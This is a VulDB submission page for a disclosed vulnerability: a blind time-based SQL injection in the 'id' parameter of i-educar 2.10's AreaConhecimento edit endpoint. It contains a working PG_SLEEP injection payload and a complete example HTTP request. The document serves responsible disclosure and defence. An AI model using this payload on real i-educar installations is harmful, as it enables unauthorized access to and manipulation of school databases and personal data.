Submit #638577: Portabilis i-educar 2.10 SQL Injectioninfo

TitelPortabilis i-educar 2.10 SQL Injection
Beschreibung# SQL Injection (Blind Time-Based) Vulnerability in `id` Parameter on `/module/AreaConhecimento/edit` Endpoint --- ## Summary A SQL Injection vulnerability was identified in the `/module/AreaConhecimento/edit` endpoint of the _i-educar_ application, specifically in the `id` parameter. This vulnerability allows attackers to execute arbitrary SQL commands on the backend database, potentially compromising the confidentiality, integrity, and availability of application data. --- ## Details **Vulnerable Endpoint:** `/module/AreaConhecimento/edit` **Parameter:** `id` To reach the vulnerable functionality, it is necessary to navigate to: **Escola > Cadastros > Tipos > Regras de Avaliação > Listagem de áreas de conhecimento. ![[Pasted image 20250817192322.png]] Additionally, exploiting this vulnerability requires an account with permissions to **create/list the "Escola" menu**. The application fails to properly validate and sanitize user input in the `id` parameter. As a result, attackers can inject crafted SQL payloads that are executed directly by the database. This could allow database enumeration, data exfiltration, modification, or denial of service via time-based delays. --- ## PoC **Payload:** `'+AND+7097=(SELECT+7097+FROM+PG_SLEEP(5))+AND+'WqeR'='WqeR` This payload triggers a **5-second delay** in the server response, demonstrating that the parameter is vulnerable to blind time-based SQL injection. **Example Request:** ``` POST /module/AreaConhecimento/edit?id=3'+AND+7097=(SELECT+7097+FROM+PG_SLEEP(5))+AND+'WqeR'='WqeR HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br, zstd Content-Type: application/x-www-form-urlencoded Content-Length: 90 Origin: http://localhost Connection: keep-alive Referer: http://localhost/module/AreaConhecimento/edit?id=3 Cookie: grav-admin-flexpages=eyJyb3V0ZSI6Ii9ob21lIiwiZmlsdGVycyI6e319; grav-tabs-state={%22tab--f0e041eed24f87f2b6b02fd6924d0a08%22:%22data.languages%22%2C%22tab-flex-pages-e838602f51515c83bca06a8ae758ce52%22:%22data.security%22%2C%22tab-flex-pages-b6676b27f5cdf6b6c22f8e18da4259a0%22:%22data.advanced%22%2C%22tab-flex-pages-raw-8f0a83a672754f7823714134334b1de8%22:%22data.content%22%2C%22tab-flex-pages-dc26c564cb2116d77bda5fff24ba90dc%22:%22data.security%22%2C%22tab-flex_conf-user_groups-accounts-02f0e9f68f41a0648ed530f80bd72c06%22:%22data.cache%22%2C%22tab-flex-pages-raw-9a0364b9e99bb480dd25e1f0284c8555%22:%22data.content%22%2C%22tab-flex-pages-e91e6348157868de9dd8b25c81aebfb9%22:%22data.security%22%2C%22tab--8cc45760590da203c5fc3568ecbabd66%22:%22data.routes%22%2C%22tab--7a2ac3477f8ad14aa750831441325a16%22:%22data.facebook%22}; i_educar_session=iIw1P9Yxwm9hsXZb74mgDwRm5ltCSdmSQuuURvmG Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Priority: u=0, i tipoacao=Editar&id=3&instituicao=1&nome=Educa%C3%A7%C3%A3o+Infantil&secao=&ordenamento_ac= ``` ![[Pasted image 20250817193035.png]] Observe the increased server response time, confirming that the injected SQL command was executed. --- ## Impact - **Unauthorized data access:** Reading sensitive information such as credentials, personal data, or configuration details - **Database enumeration:** Extracting database schema, tables, and column details - **Data manipulation:** Adding, modifying, or deleting database records - **Denial of Service (DoS):** Using time-based queries to impact system availability - **Potential escalation to RCE:** If combined with other vulnerabilities and specific database features This vulnerability affects all users who can interact with the vulnerable parameter, and it can be exploited remotely without prior authentication if the endpoint is exposed.
Quelle⚠️ https://github.com/marcelomulder/CVE/blob/main/i-educar/SQL%20Injection%20(Blind%20Time-Based)%20Vulnerability%20in%20%60id%60%20Parameter%20on%20%60.module.AreaConhecimento.edit%60%20Endpoint.md
Benutzer
 marceloQz (UID 87549)
Einreichung20.08.2025 16:33 (vor 10 Monaten)
Moderieren29.08.2025 12:57 (9 days later)
StatusAkzeptiert
VulDB Eintrag321898 [Portabilis i-Educar bis 2.10 Listagem de áreas de conhecimento Page edit ID SQL Injection]
Punkte20

ZurückÜbersichtWeiter

Want to know what is going to be exploited?

We predict KEV entries!